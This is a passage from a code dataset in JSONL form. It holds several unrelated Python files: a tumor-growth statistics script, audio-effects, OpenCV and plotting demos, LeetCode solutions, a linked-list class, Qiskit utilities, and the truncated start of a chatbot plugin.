scanner_info.loc[i]\n row_id = np.where((full_data[\"Patient\"] == patient) & (full_data[\"Timestamp\"] == timestamp))[0]\n\n if len(row_id) == 0:\n continue\n\n full_data.loc[row_id[0], \"Manufacturer\"] = manufacturer\n full_data.loc[row_id[0], \"Model_Name\"] = model_name\n full_data.loc[row_id[0], \"Tesla\"] = float(tesla)\n \n unique_patients = np.asarray(full_data[\"Patient\"].drop_duplicates())\n print(\"Number of unique patients in full_data before removing Volume=0:\", len(unique_patients))\n\n # need to filter NaN volumes on merged data frame\n # remove all occurences where Volumes=0 (not possible -> tumor was not annotated)\n full_data_nonzero = full_data[full_data.Volume != 0]\n\n unique_patients = np.asarray(full_data_nonzero[\"Patient\"].drop_duplicates())\n print(\"Number of unique patients in full_data_nonzero AFTER removing Volume=0:\", len(unique_patients))\n\n # after filtering, we need to reset indices in full_data to go 0:1:N\n full_data_nonzero.index = 
list(range(len(full_data_nonzero)))\n\n # remove all occurences where Volumes=0 (not possible -> tumor was not annotated)\n #filter_zero_volumes = full_data[\"Volume\"] != str(0.0)\n #full_data_nonzero = full_data[filter_zero_volumes]\n\n # get current age at scan and add to data frame\n curr_age_at_scan = full_data_nonzero[\"Date\"] - full_data_nonzero[\"Birth_Year\"]\n curr_age_at_scan = curr_age_at_scan.dt.days\n full_data_nonzero[\"Current_Age\"] = curr_age_at_scan.astype(float)\n full_data_nonzero[\"Current_Age_Years\"] = np.array(full_data_nonzero[\"Current_Age\"]).astype(\"float32\") / 365.25\n\n # get age at initial/earliest scan\n full_data_nonzero[\"Initial_Age\"] = (np.nan * np.ones(full_data_nonzero.shape[0]))\n unique_patients = np.asarray(full_data_nonzero[\"Patient\"].drop_duplicates())\n for pat in tqdm(unique_patients, \"Adding initial age info\"):\n curr_pat_filter = full_data_nonzero[\"Patient\"] == pat\n curr = full_data_nonzero[curr_pat_filter]\n curr_row = np.where(np.array(curr[\"Earliest_Timestamp\"]) == 1)[0]\n initial_age = float(curr.iloc[curr_row][\"Current_Age_Years\"])\n \n full_data_nonzero.loc[curr_pat_filter, \"Initial_Age\"] = initial_age\n\n # get relative difference in days between scans\n relative_difference_between_scans = full_data_nonzero[\"Date\"] - full_data_nonzero[\"First_Timestamp_Date\"]\n relative_difference_between_scans = relative_difference_between_scans.dt.days\n full_data_nonzero[\"Relative_Days_Difference\"] = relative_difference_between_scans.astype(\"float32\")\n full_data_nonzero[\"Follow_Up_Months\"] = relative_difference_between_scans.astype(\"float32\") / 30\n\n # get relative volume ratios between scans\n relative_volume_ratio = full_data_nonzero[\"Volume\"] / full_data_nonzero[\"Initial_Volume\"]\n full_data_nonzero[\"Relative_Volume_Ratio\"] = relative_volume_ratio.astype(\"float32\")\n\n # filter patients that show no growth? 
- how to determine if tumor has grown?\n    # Look at first and last timestep volume size?\n    volume_change = full_data_nonzero[\"Final_Volume\"] - full_data_nonzero[\"Initial_Volume\"]\n\n    # remove patients with slice thickness higher than or equal to X\n    # slice_thickness_filter = np.array(full_data_nonzero[\"Spacing3\"]) < 2\n    # full_data_nonzero = full_data_nonzero[slice_thickness_filter]\n\n    # check that no patient has less than 3 timestamps\n    timestamp_lengths = []\n    for patient in np.unique(full_data_nonzero[\"Patient\"]):\n        curr_patient_data = full_data_nonzero[full_data_nonzero[\"Patient\"] == patient]\n        timestamps = curr_patient_data[\"Timestamp\"]\n        timestamp_lengths.append(len(timestamps))\n    print(np.unique(timestamp_lengths, return_counts=True))\n    print(\"-> All current patients have >= 3 timestamps with tumour volume > 0\")\n\n    # create summary statistics for study - Table 1\n\n    # patient_filter_ = full_data_nonzero[\"Timestamp\"] == \"T1\"\n    # @TODO: After removing volumes with 0 size, some T1 points are now missing (FIXED BELOW)\n    patient_filter_ = np.array(full_data_nonzero[\"Earliest_Timestamp\"]) == 1\n\n    # multifocality\n    multifocality = np.array(full_data_nonzero[\"Multifocality\"][patient_filter_])\n    Clusters_total = np.array(full_data_nonzero[\"Clusters_total\"][patient_filter_])\n\n    # age_at_T1 = np.array(full_data_nonzero[\"Current_Age\"][patient_filter_]).astype(\"float32\") / 365.25\n    genders = np.array(full_data_nonzero[\"Gender\"][patient_filter_])\n\n    # init_volume_size = np.array(full_data_nonzero[\"Volume\"][patient_filter_])\n    number_of_mri_scans = np.array(full_data_nonzero[\"Number_Of_Timestamps\"][patient_filter_])\n    slice_thickness = np.array(full_data_nonzero[\"Spacing3\"][patient_filter_])\n\n    t2_hyperintense_orig = full_data_nonzero[\"T2\"][patient_filter_]\n    t2_hyperintense = t2_hyperintense_orig.replace('nan', np.nan)\n    t2_hyperintense = np.asarray(t2_hyperintense.dropna()).astype(int)\n\n    oedema_orig = full_data_nonzero[\"Oedema\"][patient_filter_]\n    oedema = oedema_orig.replace('nan', np.nan)\n    oedema = np.asarray(oedema.dropna()).astype(int)\n\n    earliest_timestamp_filter = np.array(full_data_nonzero[\"Earliest_Timestamp\"] == 1)\n    init_volume_size = np.array(full_data_nonzero[\"Volume\"][earliest_timestamp_filter])\n    age_at_T1 = np.array(full_data_nonzero[\"Current_Age\"][earliest_timestamp_filter]).astype(\"float32\") / 365.25\n\n    patients = np.unique(full_data_nonzero[\"Patient\"])\n    total_follow_up_days = []\n    for patient in patients:\n        curr = full_data_nonzero[full_data_nonzero[\"Patient\"] == patient][\"Relative_Days_Difference\"]\n        total_follow_up_days.append(max(curr))\n    total_follow_up_months = np.array(total_follow_up_days) / 30\n\n    # @TODO: Which threshold to use? Base it on measurement error (largest error, quantiles?) in\n    # inter-rater variability study? 
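(Worked example with illustrative numbers: under a 0.15 cut-off, a tumor going from 10.0 ml to 11.8 ml has relative change (11.8 - 10.0) / 10.0 = 0.18 > 0.15, so it is classed as growth (+1) below.)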
15 % makes sense as it corresponds to the largest error in the inter-rater study\n    relative_growth_threshold = 0.15\n\n    full_data_nonzero_grew_only = full_data_nonzero.copy()\n    volume_change = []\n    volume_change_relative = []\n    volume_grew = []\n    volume_shrank = []\n    volume_no_change = []\n    volume_change_categorical = []\n    grow_patients = []\n    for patient in patients:\n        curr = full_data_nonzero[full_data_nonzero[\"Patient\"] == patient]\n        first_timestamp = get_earliest_timestamp(curr[\"Timestamp\"])\n        last_timestamp = get_last_timestamp(curr[\"Timestamp\"])\n        initial_size = np.array(curr[curr[\"Timestamp\"] == first_timestamp][\"Volume\"])[0]\n        final_size = np.array(curr[curr[\"Timestamp\"] == last_timestamp][\"Volume\"])[0]\n\n        relative_change = (final_size - initial_size) / initial_size\n        initial_size = float(initial_size)\n        final_size = float(final_size)\n        volume_change.append(final_size - initial_size)\n        volume_change_relative.append(relative_change)\n\n        if relative_change > relative_growth_threshold:\n            volume_change_categorical.append(1)\n            volume_grew.append([patient, initial_size, relative_change])\n        elif relative_change < - relative_growth_threshold:\n            volume_change_categorical.append(-1)\n            volume_shrank.append([patient, initial_size, relative_change])\n        else:\n            volume_change_categorical.append(0)\n            volume_no_change.append([patient, initial_size, relative_change])\n\n    volume_change = np.array(volume_change)\n    volume_change_relative = np.array(volume_change_relative)\n\n    # get yearly growth (365.25 days per year)\n    yearly_growth = np.array(volume_change_relative) / (np.array(total_follow_up_days) / 365.25)\n\n    N = len(age_at_T1)\n    print(\"total number of patients:\", len(age_at_T1))\n    print(\"age: median/IQR/min/max:\", np.round(np.median(age_at_T1), 1), np.round(stats.iqr(age_at_T1), 1),\n          np.round(np.min(age_at_T1), 1), np.round(np.max(age_at_T1), 1))\n    print(\"gender (women count/%):\", sum(genders == \"woman\"), np.mean(genders == \"woman\"))\n    print(\"initial volume size at T1: (median/IQR/min/max):\", np.round(np.median(init_volume_size), 1),\n          np.round(stats.iqr(init_volume_size), 1), np.round(np.min(init_volume_size), 1),\n          np.round(np.max(init_volume_size), 1))\n    print(\"number of MRI scans per patient: (median/IQR/min/max):\", np.round(np.median(number_of_mri_scans), 1),\n          np.round(stats.iqr(number_of_mri_scans), 1), np.round(np.min(number_of_mri_scans), 1),\n          np.round(np.max(number_of_mri_scans), 1))\n    print(\"total follow up in months: (median/IQR/min/max):\", np.round(np.median(total_follow_up_months), 1),\n          np.round(stats.iqr(total_follow_up_months), 1), np.round(np.min(total_follow_up_months), 1),\n          np.round(np.max(total_follow_up_months), 1))\n    print(\"volume change (T1 to T-last): (median/IQR/min/max):\", np.round(np.median(volume_change), 1),\n          np.round(stats.iqr(volume_change), 1), np.round(np.min(volume_change), 1),\n          np.round(np.max(volume_change), 1))\n    print(\"relative volume change (T1 to T-last): (median/IQR/min/max):\", np.round(np.median(volume_change_relative), 3),\n          np.round(stats.iqr(volume_change_relative), 3), np.round(np.min(volume_change_relative), 3),\n          np.round(np.max(volume_change_relative), 3))\n    print(\"yearly relative growth (T1 to T-last): (median/IQR/min/max):\",\n          np.round(np.median(yearly_growth), 3),\n          np.round(stats.iqr(yearly_growth), 3), np.round(np.min(yearly_growth), 3),\n          np.round(np.max(yearly_growth), 3))\n    print(\"number of patients with tumors that grew/no change/shrank:\",\n          len(volume_grew), len(volume_no_change), len(volume_shrank), \"| % |\",\n          
np.round(len(volume_grew) / N, 3),\n np.round(len(volume_no_change) / N, 3),\n np.round(len(volume_shrank) / N, 3))\n print(\"slice thickness: (median/IQR/min/max):\",\n np.round(np.median(slice_thickness), 3),\n np.round(stats.iqr(slice_thickness), 3), np.round(np.min(slice_thickness), 3),\n np.round(np.max(slice_thickness), 3))\n print(\"multifocality (count + %):\", sum(multifocality), sum(multifocality) / len(multifocality))\n print(\"clusters total: (median/IQR/min/max):\",\n np.round(np.median(Clusters_total), 3),\n np.round(stats.iqr(Clusters_total), 3), np.round(np.min(Clusters_total), 3),\n np.round(np.max(Clusters_total), 3))\n print(\"Manufacturer (count + %):\", np.unique(full_data_nonzero[\"Manufacturer\"], return_counts=True),\n np.unique(full_data_nonzero[\"Manufacturer\"], return_counts=True)[1] / len(full_data_nonzero))\n print(\"Model_Name (count + %):\", np.unique(full_data_nonzero[\"Model_Name\"], return_counts=True),\n np.unique(full_data_nonzero[\"Model_Name\"], return_counts=True)[1] / len(full_data_nonzero))\n print(\"Tesla (count + %):\", np.unique(full_data_nonzero[\"Tesla\"], return_counts=True),\n np.unique(full_data_nonzero[\"Tesla\"], return_counts=True)[1] / len(full_data_nonzero))\n\n # T2 hyperintense signal - calculate summary statistics\n tmp = np.unique(t2_hyperintense, return_counts=True)\n print(\"T2 hyperintense signal (counts for 1/2/3 categories):\",\n tmp, tmp[1] / len(t2_hyperintense))\n tmp = np.unique(oedema, return_counts=True)\n print(\"Oedema (counts for 0/1 categories):\",\n tmp, tmp[1] / len(oedema))\n\n # create temporary dataframe to store data relevant for statistical analysis\n df_association = pd.DataFrame({\n \"volume_change\": volume_change,\n \"volume_change_relative\": volume_change_relative,\n \"init_volume_size\": init_volume_size,\n \"age_at_T1\": age_at_T1,\n \"total_follow_up_months\": total_follow_up_months,\n \"T2\": t2_hyperintense_orig.astype(\"float32\"),\n \"oedema\": oedema_orig.astype(\"float32\"),\n \"genders\": genders,\n \"Spacing3\": slice_thickness,\n \"Multifocality\": multifocality,\n \"yearly_growth\": yearly_growth,\n \"volume_change_categorical\": volume_change_categorical,\n })\n\n # remove rows with missing values\n if remove_missing:\n # remove Model_Name from dataframe for convenience\n before = full_data_nonzero.shape\n full_data_nonzero = full_data_nonzero.drop(\"Model_Name\", axis=1)\n full_data_nonzero = full_data_nonzero.drop(\"Manufacturer\", axis=1)\n full_data_nonzero = full_data_nonzero.replace(\"nan\", np.nan)\n full_data_nonzero = full_data_nonzero.dropna()\n full_data_nonzero.index = list(range(len(full_data_nonzero)))\n print(\"DataFrame shape before/after dropna() + remove Model_Name + Manufacturer column:\", before, full_data_nonzero.shape)\n \n # remove rows/patients with multifocal tumors\n if remove_multifocal:\n before = full_data_nonzero.shape\n full_data_nonzero = full_data_nonzero[full_data_nonzero[\"Multifocality\"] == 0] # ignore 1 -> multifocal tumor occured in patient\n print(\"Dataframe shape before/after removing multifocal tumors:\", before, full_data_nonzero.shape)\n\n # save processed data frame as CSV on disk\n if export_csv:\n full_data_nonzero.to_csv(os.path.join(\n data_path, \"fused_dataset_growth_analysis_remove-surgery_\" + \\\n str(remove_surgery) + \"_remove-missing_\" + str(remove_missing) + \\\n \"_remove_multifocal_\" + str(remove_multifocal) + \".csv\")\n )\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"-rs\", 
\"--remove-surgery\", action='store_true',\n help=\"Whether to remove patients that had surgery.\")\n parser.add_argument(\"-ex\", \"--export-csv\", action='store_true',\n help=\"Whether to export generated tables as CSVs.\")\n parser.add_argument(\"-rm\", \"--remove-missing\", action=\"store_true\",\n help=\"Whether to remove missing values or not before exporting CSV.\")\n parser.add_argument(\"-rf\", \"--remove-multifocal\", action=\"store_true\",\n help=\"Whether to remove patients with multifocal tumors before exporting CSV.\")\n args = parser.parse_args()\n print(\"arguments:\", args)\n\n data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../../data/\")\n \n if not os.path.isdir(data_path):\n raise ValueError(\"data/ directory was not found. Please, ensure that the data/ directory is placed at the same level as src/.\")\n\n preprocess(\n data_path=data_path,\n remove_surgery=args.remove_surgery,\n export_csv=args.export_csv,\n remove_missing=args.remove_missing,\n remove_multifocal=args.remove_multifocal\n )\n\n margins_of_error(data_path=data_path)\n\n print(\"Finished!\")\n","repo_name":"andreped/tumor-growth","sub_path":"src/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13492119241","text":"from pedalboard import Pedalboard, Reverb, load_plugin\nfrom pedalboard.io import AudioFile\nimport time\n\nstart = time.time()\n\n# Let's upload an existing third-party plugin (VST3)\nvst = load_plugin(\"/Library/Audio/Plug-Ins/VST3/Auburn Sounds Graillon 2.vst3\")\n\n# Now we print the parameters possessed by the plugins\nprint(vst.parameters.keys())\n\n# We change the 'pitch_shift_st' parameter so that we have a voice gender transformation. 
Check it out!\nvst.pitch_shift_st = 3.84\n\n# Let's add a stock reverb plugin to the effects chain\nboard = Pedalboard([vst, Reverb()])\n\n# Let's open an audio file and apply our board\nwith AudioFile('media/input_file.wav', 'r') as f:\n audio = f.read(f.frames)\n samplerate = f.samplerate\n\neffected = board(audio, samplerate)\n\n# Write the audio back as a wav file:\nwith AudioFile('media/output_file.wav', 'w', samplerate, effected.shape[0]) as f:\n f.write(effected)\n\nend = time.time()\ntotal_time = end - start\nprint(\"\\nTime elapsed: \" + str(total_time) + \" seconds\")\n","repo_name":"Robooze/pedalboard_tut","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1437137010","text":"# https://leetcode.com/contest/weekly-contest-302/problems/query-kth-smallest-trimmed-number/\nclass Solution:\n def smallestTrimmedNumbers(self, nums: List[str], queries: List[List[int]]) -> List[int]:\n N = len(nums)\n M = len(nums[0])\n sortedNumsOfLen = [ [] for _ in range(M) ]\n for t in range(M):\n for i,s in enumerate(nums):\n v = int(s[~t:])\n sortedNumsOfLen[t] += [ (v,i) ]\n sortedNumsOfLen[t].sort()\n\n ans = []\n for k,t in queries:\n x,i = sortedNumsOfLen[t-1][k-1]\n ans += [i]\n return ans\n","repo_name":"henryliuser/hliu-cp","sub_path":"leetcode/medium/query_kth_smallest_trimmed_number.py","file_name":"query_kth_smallest_trimmed_number.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"3527256428","text":"\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ncap = cv2.VideoCapture(\"video/4.mp4\")\r\n\r\n# Create trackbar\r\nxPos = 0\r\nyPos = 0\r\nradius = 20\r\nthickness = 1\r\ndef myCallBackFunctionOne(val):\r\n global xPos\r\n print(\"xPos : \", val)\r\n xPos = val\r\n \r\n\r\ndef myCallBackFunctionTwo(val):\r\n global yPos\r\n print(\"yPos : \", val)\r\n yPos = val\r\n\r\n\r\ndef myCallBackFunctionThree(val):\r\n global radius\r\n print(\"radius : \", radius)\r\n radius = val\r\n\r\n\r\ndef myCallBackFunctionFour(val):\r\n global thickness\r\n print(\"Thickness : \", thickness)\r\n thickness = val\r\n \r\n\r\nwidth = 640\r\ncv2.namedWindow(\"newTrackbars\")\r\ncv2.resizeWindow(\"newTrackbars\", 400, 150)\r\ncv2.moveWindow(\"newTrackbars\", width , 0)\r\ncv2.createTrackbar(\"xPos\", \"newTrackbars\", xPos, 640, myCallBackFunctionOne)\r\ncv2.createTrackbar(\"yPos\", \"newTrackbars\", yPos, 400, myCallBackFunctionTwo)\r\ncv2.createTrackbar(\"radius\", \"newTrackbars\", radius, 100, myCallBackFunctionThree)\r\ncv2.createTrackbar(\"thickness\", \"newTrackbars\", thickness, 6, myCallBackFunctionFour)\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n frame = cv2.resize(frame, (640, 400))\r\n if(thickness == 0):\r\n thickness = -1\r\n cv2.circle(frame, (xPos, yPos), radius, (255, 100, 100), thickness)\r\n\r\n cv2.imshow(\"frame\", frame)\r\n if(cv2.waitKey(1) & 0xff == ord('f')):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"aadarshraj4321/Computer-Vision","sub_path":"basic_operations/basic_operations_with_video_and_webcam/creating_and_using_trackbars_openCV.py","file_name":"creating_and_using_trackbars_openCV.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"44259080223","text":"import numpy as np\nimport pandas as 
pd\nimport matplotlib.pyplot as plt\n\nmean, sigma = 8, 1.5\n\n# input feature 1 using normal distribution\nx1 = abs(np.random.normal(mean, sigma, 20))\n\n# input feature 2 using normal distribution\nx2 = abs(np.random.normal(mean, sigma, 20))\n\nx = np.c_[x1, x2]\ny = [np.random.binomial(100, 0.6, 20)]\n\ndata_set = pd.DataFrame()\n\n# defining the columns of the dataset\ndata_set['col1'] = x1\ndata_set['col2'] = x2\n\n# 2D Projection of Dataset\nplt.subplot(121)\nplt.title('X1 Input Feature VS Y Output Feature', fontsize='small')\nplt.scatter(y, x1, color='r', label='col1')\nplt.xlabel('y')\nplt.ylabel('x1')\n\nplt.subplot(122)\nplt.title('X2 Input Feature VS Y Output Feature', fontsize='small')\nplt.scatter(y, x2, color='b', label='col2')\nplt.xlabel('y')\nplt.ylabel('x2')\n\n\n# 3D Projection of Dataset\nfig = plt.figure()\nax = plt.axes(projection='3d')\nax.scatter3D(x1, x2, y, c=y, cmap='hot_r')\nax.set_title('3D Projection of Dataset')\nax.set_xlabel('x1')\nax.set_ylabel('x2')\nax.set_zlabel('y')\n\nplt.show()","repo_name":"tomarviii88/ITIT-4103-2021","sub_path":"Assignment-1/Assignment1a.py","file_name":"Assignment1a.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22800657195","text":"# Problem Description\n# Given a binary tree, return the Postorder traversal of its nodes' values.\n# NOTE: Using recursion is not allowed.\n#\n# Problem Constraints\n# 1 <= number of nodes <= 10^5\n#\n# Input Format\n# First and only argument is root node of the binary tree, A.\n#\n# Output Format\n# Return an integer array denoting the Postorder traversal of the given binary tree.\n#\n# Example Input\n# Input 1:\n#\n#      1\n#       \\\n#        2\n#       /\n#      3\n# Input 2:\n#\n#    1\n#   / \\\n#  6   2\n#     /\n#    3\n#\n#\n# Example Output\n# Output 1: [3, 2, 1]\n# Output 2: [6, 3, 2, 1]\n#\n# Example Explanation\n# Explanation 1: The Postorder Traversal of the given tree is [3, 2, 1].\n# Explanation 2: The Postorder Traversal of the given tree is [6, 3, 2, 1].\n\n# Definition for a binary tree node\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution:\n    # @param A : root node of tree\n    # @return a list of integers\n    def postorderTraversal_app1(self, A):\n        stack = []\n        ans = []\n        while stack or A is not None:\n            if A is not None:\n                # push all left children onto the stack\n                stack.append(A)\n                A = A.left\n            else:\n                if stack[-1].right is not None:\n                    # if A has right child\n                    A = stack[-1].right\n                else:\n                    # if A has no right child\n                    element = stack.pop()\n                    ans.append(element.val)\n\n                    while stack and stack[-1].right is element:\n                        # pop ancestors whose right child was just processed\n                        element = stack.pop()\n                        ans.append(element.val)\n        return ans\n\n    # Approach#2:-\n    def postorderTraversal_app2(self, A):\n        stack = [A]\n        ans = []\n        while stack:\n            top = stack.pop()\n            ans.append(top.val)\n            if top.left:\n                stack.append(top.left)\n            if top.right:\n                stack.append(top.right)\n        return ans[::-1]\n\n# Observation/Approach followed:-\n#\n# Recursive call would look something like this :\n#\n# postorderprint(root->left);\n# postorderprint(root->right);\n# print(root->val);\n#\n# Instead of calling the functions, we can put the nodes on a stack and process 
them\n","repo_name":"Abhilash-du/daily-coding-challenges","sub_path":"DataStructures/Trees/PostOrderTraversal.py","file_name":"PostOrderTraversal.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118604073","text":"from typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\n# https://leetcode.com/problems/recover-a-tree-from-preorder-traversal/discuss/274621/JavaC%2B%2BPython-Iterative-Stack-Solution\nclass Solution:\n def recoverFromPreorder(self, traversal: str) -> Optional[TreeNode]:\n stack = []\n index = 0\n\n while index < len(traversal):\n level = 0\n val = ''\n\n while index < len(traversal) and traversal[index] == '-':\n level += 1\n index += 1\n\n while index < len(traversal) and traversal[index] != '-':\n val += traversal[index]\n index += 1\n\n while len(stack) > level:\n stack.pop()\n\n node = TreeNode(int(val))\n\n if stack and stack[-1].left is None:\n stack[-1].left = node\n elif stack:\n stack[-1].right = node\n\n stack.append(node)\n\n return stack[0]\n","repo_name":"cabulous/leetcode","sub_path":"python/1028.py","file_name":"1028.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7063124146","text":"class Node:\r\n #constructor to initialise the node\r\n def __init__(self, v = None):\r\n self.value = v\r\n self.next = None\r\n\r\nclass LinkedList(Node):\r\n #constructor to initialise a Linked List i.e head node is NULL\r\n def __init__(self):\r\n self.head = None\r\n \r\n #method/function to check if the linked list is empty or not\r\n def isEmpty(self):\r\n if (self.head == None):\r\n return True\r\n return False\r\n\r\n #method to add a node at the end of the list\r\n def append(self, v):\r\n if self.isEmpty():\r\n self.head = Node(v)\r\n return\r\n temp = self.head\r\n while (temp.next != None):\r\n temp = temp.next\r\n temp.next = Node(v)\r\n return\r\n\r\n #method to insert a node at the front of the list\r\n def addFront(self, v):\r\n new_node = Node(v)\r\n new_node.next = self.head\r\n self.head = new_node\r\n return\r\n\r\n #method to delete a node with a given value v\r\n def delete(self, v):\r\n if self.isEmpty():\r\n return\r\n temp = self.head\r\n if temp.value == v:\r\n self.head = temp.next\r\n temp = None\r\n return\r\n else:\r\n while temp.next != None:\r\n if temp.value == v:\r\n break\r\n temp = temp.next\r\n if temp.next == None:\r\n return\r\n temp.value = None\r\n if temp.next != None:\r\n temp.value = temp.next.value\r\n temp.next = temp.next.next\r\n\r\n #method to add a node at a specified position\r\n def addNode(self, v, pos):\r\n if pos == 1:\r\n addFront(v)\r\n return\r\n new_node = Node(v)\r\n temp = self.head\r\n i = 1\r\n while (temp != None) and (i < pos-1):\r\n temp = temp.next\r\n i += 1\r\n if temp == None:\r\n return\r\n new_node.next = temp.next\r\n temp.next = new_node\r\n \r\n #method to display the linked list\r\n def display(self):\r\n temp = self.head\r\n if self.isEmpty():\r\n print(\"List is Empty\")\r\n return\r\n while (temp.next != None):\r\n print(temp.value, end = \" -> \")\r\n temp = temp.next\r\n print(temp.value)\r\n \r\nn = LinkedList()\r\nn.addFront(5)\r\nn.addFront(7)\r\nn.addFront(3)\r\nn.append(6)\r\nprint(\"Linked List is : \")\r\nn.display()\r\nn.delete(7)\r\nprint(\"\\nLinked List after deleting Node 
with value 7 : \")\r\nn.display()\r\nn.addNode(10,2)\r\nprint(\"\\nLinked List after adding a Node with value 10 at position 2 : \")\r\nn.display()","repo_name":"gunjannayak2k20/hacktoberfest-2021-accepted","sub_path":"DSA in python/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"24166773698","text":"# 测试读取文件 输入输出\n\nimport model\n\n\ndef getGisasList():\n with open('./file/gaiadr2_12arcmin_r_ad.txt', mode='r') as file:\n gais_list = []\n while True:\n content = file.readline().split()\n if not content:\n break\n # 非空才进行转换,否则可能读到最后一行空字符的情况\n gais_info = model.GaiaStarInformation(\n content[0], float(content[1]), float(content[2]), float(content[3]), float(content[4]), float(content[5]), float(content[6]), float(content[7]))\n gais_list.append(gais_info)\n return gais_list\n\n\ndef getInputStarList():\n with open('./file/inputstar129.txt', mode='r') as file:\n input_list = []\n while True:\n content = file.readline().split()\n if not content:\n break\n # 非空才进行转换,否则可能读到最后一行空字符的情况\n inputstar = model.InputStar(\n float(content[0]), float(content[1]))\n input_list.append(inputstar)\n print(inputstar)\n return input_list\n\n\n# getInputStarList()\n","repo_name":"msclam/CodeRepo","sub_path":"StarProgram/python/六常数匹配/star/deal.py","file_name":"deal.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39656557571","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 5 22:37:39 2021\n\n@author: Fidel\n\"\"\"\n\n# Standard libraries\nfrom numpy import array, kron\n\n# Qiskit libraries\nfrom qiskit import IBMQ\nfrom qiskit_ibm_provider import IBMProvider\nimport mthree\n\n#from token import tokenid\nfrom tokenid import tokenid \n\n#try:\n# import token.token\n#except:\n #token = \n# pass\n\n# IBM Quantum account utils\n\n#def startup(check=False, token=tokenid, hub='ibm-q-melbourne', group=None, project=None):\n# \n\ndef startup(check=False, token=tokenid, hub='ibm-q-melbourne', group=None, project=None):\n \"\"\"Start up session\"\"\"\n \n try:\n provider = IBMProvider()\n except:\n IBMProvider.save_account(token=tokenid)\n provider = IBMProvider()\n print(\"Account enabled\")\n \n if check:\n check_provider(hub)\n \n return provider\n \ndef check_provider(hub='ibm-q-melbourne'):\n \"\"\"Check list of providers with queue size and qubit count for input hub\"\"\"\n provider = IBMProvider()\n \n for backend in provider.backends():\n try:\n qubit_count = len(backend.properties().qubits)\n except:\n qubit_count = 'simulated'\n print(f'{backend.name()} has {backend.status().pending_jobs} queud and {qubit_count} qubits')\n \n \n# Math objects\n\npauli = {'I': array([[1, 0], [0, 1]], dtype=complex),\n 'X': array([[0, 1], [1, 0]], dtype=complex),\n 'Y': array([[0, -1j], [1j, 0]], dtype=complex),\n 'Z': array([[1, 0], [0, -1]], dtype=complex)}\n\n\n# Math functions\n\ndef bit_str_list(n):\n \"\"\"Create list of all n-bit binary strings\"\"\"\n return [format(i, 'b').zfill(n) for i in range(2**n)]\n \ndef pauli_n(basis_str):\n \"\"\"Calculate kronecker tensor product sum of basis from basis string\"\"\"\n \n M = pauli[basis_str[0]]\n try:\n for basis in basis_str[1:]:\n M_new = kron(M, pauli[basis])\n M = M_new\n except: pass # Single basis case\n \n return M \n\n# Run and load mthree calibrations\ndef run_cal(backend, initial_layout, filename=None):\n mit 
= mthree.M3Mitigation(backend)\n    mit.cals_from_system(initial_layout, shots=8192)\n    if filename is None:\n        filename = f'calibrations/{backend.name()}_cal.json'\n    mit.cals_to_file(filename)\n    \n    return mit\n    \ndef load_cal(backend=None, filename=None):\n    mit = mthree.M3Mitigation()\n    if filename is None:\n        filename = f'calibrations/{backend.name()}_cal.json'\n    mit.cals_from_file(filename)\n    \n    return mit\n\ndef list_retrieve_jobs(job_ids):\n    for i, job_id in enumerate(job_ids):\n        print(f'job{i+1} = provider.backend.retrieve_job(\\'{job_id}\\')')\n    \n\n    ","repo_name":"jkfids/qiskit-entangle","sub_path":"code/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27946452165","text":"import lxml.etree\nfrom pathlib import Path\nfrom typing import Dict, List\nfrom nonebot import on_command\nfrom nonebot.adapters.onebot.v11 import GROUP\nfrom services import logger\nfrom nonebot_plugin_htmlrender import template_to_pic\nfrom utils.http_utils import AsyncHttpx\nfrom utils.message_builder import image\n\n__plugin_name__ = \"烧烤推车查询\"\n__plugin_type__ = \"烧烤相关&uni移植\"\n__plugin_version__ = 0.1\n__plugin_usage__ = f\"\"\"\nusage:\n    获取烧烤最近的推车,私聊可用\n    限制每人1分钟只能使用2次\n    指令:\n        ycm/车来/有车吗/推车\n    两个好用的烧烤推车网站:\n        城城的推车Station:http://59.110.175.37:5000/\n        纹月的推车Station:http://1.117.147.194:8459/\n\"\"\".strip()\n__plugin_settings__ = {\n    \"default_status\": False,\n    \"cmd\": [\"烧烤推车查询\", \"ycm\", \"烧烤相关\", \"uni移植\"],\n}\n__plugin_block_limit__ = {\"rst\": \"别急,正在寻找推车中\",}\n__plugin_cd_limit__ = {\n    \"cd\": 60,\n    \"limit_type\": \"user\",\n    \"count_limit\": 2,\n    \"rst\": \"别急,[cd]s后再用!\"\n}\n\n# pjsk cart lookup command\nycm = 